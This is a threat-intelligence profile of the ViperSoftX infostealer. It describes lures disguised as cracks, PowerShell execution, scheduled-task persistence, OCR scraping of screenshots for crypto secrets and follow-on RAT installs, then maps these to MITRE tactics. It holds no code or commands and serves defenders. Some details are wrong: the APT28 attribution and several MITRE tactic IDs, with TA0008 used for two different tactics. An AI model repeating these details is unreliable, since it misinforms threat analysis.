ViperSoftX | |
Type of Malware | Infostealer |
Date of initial activity | 2020 |
Targeted Countries | United States |
Addittional Names | VenomSoftX |
Associated Groups | APT28 |
Motivation | Data Theft |
Attack Vectors | Web Browsing |
Targeted Systems | Windows |
Type of Information Stolen | Login credentials |
Overview
ViperSoftX is a potent and evolving strain of malware that has gained notoriety since its initial identification in 2020. Originally recognized by Fortinet, ViperSoftX has established itself as a multifaceted threat, often masquerading as legitimate software, such as cracks or keygens for popular applications. Its primary objective is to infiltrate systems, allowing attackers to execute a range of malicious commands while stealthily stealing sensitive information, particularly in the cryptocurrency domain. The malware’s ability to adapt and integrate advanced techniques has raised concerns among cybersecurity experts, highlighting the need for ongoing vigilance in the face of increasingly sophisticated cyber threats.
The core functionality of ViperSoftX revolves around its capacity to maintain persistent access to infected systems, enabling attackers to issue commands and gather valuable data over extended periods. It is commonly distributed through deceptive means, including malicious downloads and phishing campaigns, which exploit user trust in software piracy. Once installed, ViperSoftX can deploy additional malware, such as remote access trojans (RATs) and infostealers, amplifying its threat profile. This capability not only enables attackers to control compromised machines remotely but also facilitates the collection of sensitive information, such as cryptocurrency wallet addresses, passwords, and other confidential data.
In recent iterations, ViperSoftX has demonstrated a significant evolution in its operational techniques. Rather than relying solely on JavaScript, attackers have turned to PowerShell scripts to enhance the malware’s functionality and evade detection. Additionally, the integration of advanced tools like Tesseract, an open-source optical character recognition (OCR) engine, has enabled ViperSoftX to extract text from image files on infected systems. This marks a significant advancement in the malware’s ability to target users who may store critical information as screenshots, such as cryptocurrency recovery phrases or authentication tokens.
As ViperSoftX continues to evolve, its impact on individuals and organizations has become increasingly severe. The malware’s capacity to operate stealthily while executing complex tasks underscores the importance of robust cybersecurity measures and user education. By understanding the tactics, techniques, and procedures employed by ViperSoftX, users can better defend themselves against this formidable threat. As the landscape of cybercrime shifts and adapts, ongoing awareness and proactive measures are essential to mitigate the risks associated with malware like ViperSoftX.
Targets
Information
Individuals
How they operate
Initial Access and Execution
ViperSoftX typically gains initial access through deceptive means, often masquerading as cracks or key generators for popular software. Once a user unknowingly downloads and executes the infected file, the malware deploys itself onto the system. Unlike its earlier versions, which primarily utilized JavaScript for execution, recent iterations have shifted to PowerShell scripts. This transition allows ViperSoftX to carry out commands more stealthily, leveraging PowerShell’s capabilities to bypass traditional security measures and execute additional malicious payloads.
Upon execution, ViperSoftX registers itself in the Task Scheduler, creating scheduled tasks that ensure its persistence on the infected system. For instance, the malware deploys a dropper executable—commonly named “win32.exe”—which contains multiple components, including secondary executables like “Svchost.exe” and “System32.exe.” These components are critical in establishing a foothold on the system and ensuring continuous operation, even after system reboots.
Data Collection and Exfiltration
One of the most notable features of ViperSoftX is its ability to collect sensitive information from infected machines. This malware strain is equipped with capabilities to harvest data related to cryptocurrency wallets, including addresses and private keys. For this purpose, it may check for the presence of password managers like “KeePass 2” and “1Password,” further enhancing its data-gathering capabilities.
The latest versions of ViperSoftX integrate a particularly sophisticated technique involving the use of the open-source Optical Character Recognition (OCR) engine, Tesseract. This allows the malware to scan image files on the infected system for strings that may contain sensitive information. Tesseract identifies text within images and extracts it for further analysis. If the extracted strings contain phrases related to passwords, one-time passwords (OTPs), or cryptocurrency wallet addresses, the malware will exfiltrate those images to the attackers’ command and control (C&C) servers. This method illustrates a clear focus on targeting users who may store critical information in image formats, leveraging advanced image processing techniques to facilitate data theft.
Installation of Additional Malware
ViperSoftX is not just a standalone threat; it often acts as a facilitator for other malicious strains. Once installed, it can be used to deploy additional malware, such as Quasar RAT and TesseractStealer. Quasar RAT is an open-source remote access trojan that enables attackers to gain full control over the infected system, allowing for real-time surveillance, file uploads/downloads, and keylogging activities. The seamless installation of such additional malware highlights ViperSoftX’s role as a versatile tool in the cybercriminal toolkit, allowing attackers to expand their foothold on compromised systems.
In the case of TesseractStealer, its integration showcases how ViperSoftX not only collects information but also enhances its data exfiltration capabilities by utilizing OCR technology. TesseractStealer searches for common image file formats and systematically extracts strings from these files, particularly focusing on sensitive cryptocurrency information. The targeted strings are meticulously chosen, often referencing wallet generation phrases and security instructions, demonstrating the malware’s strategic design in aiming for high-value targets.
MITRE Tactics and Techniques
Initial Access (TA0001): ViperSoftX often gains entry into systems through malicious downloads disguised as cracks or keygens for legitimate software.
Execution (TA0002): It uses PowerShell scripts for execution, enabling it to run commands and install additional payloads, including remote access trojans (RATs).
Persistence (TA0003): The malware establishes persistence through Task Scheduler, registering scripts to run automatically at specified intervals.
Privilege Escalation (TA0004): It may attempt to gain higher privileges on the infected system to execute its commands without restrictions.
Defense Evasion (TA0005): ViperSoftX employs various evasion techniques, including encryption of communication data and the use of PowerShell to bypass security measures.
Credential Access (TA0006): The malware is designed to capture sensitive information, such as cryptocurrency wallet addresses and passwords.
Discovery (TA0007): It can gather system information, such as user names and installed security products, to tailor its attacks.
Command and Control (TA0008): ViperSoftX communicates with command and control (C&C) servers to receive instructions and exfiltrate stolen data.
Exfiltration (TA0008): The malware exfiltrates sensitive information, particularly focused on cryptocurrency-related data and passwords extracted from images using Tesseract.
Impact (TA0040): The ultimate goal of ViperSoftX is to steal financial information and potentially disrupt the user’s access to their cryptocurrency assets.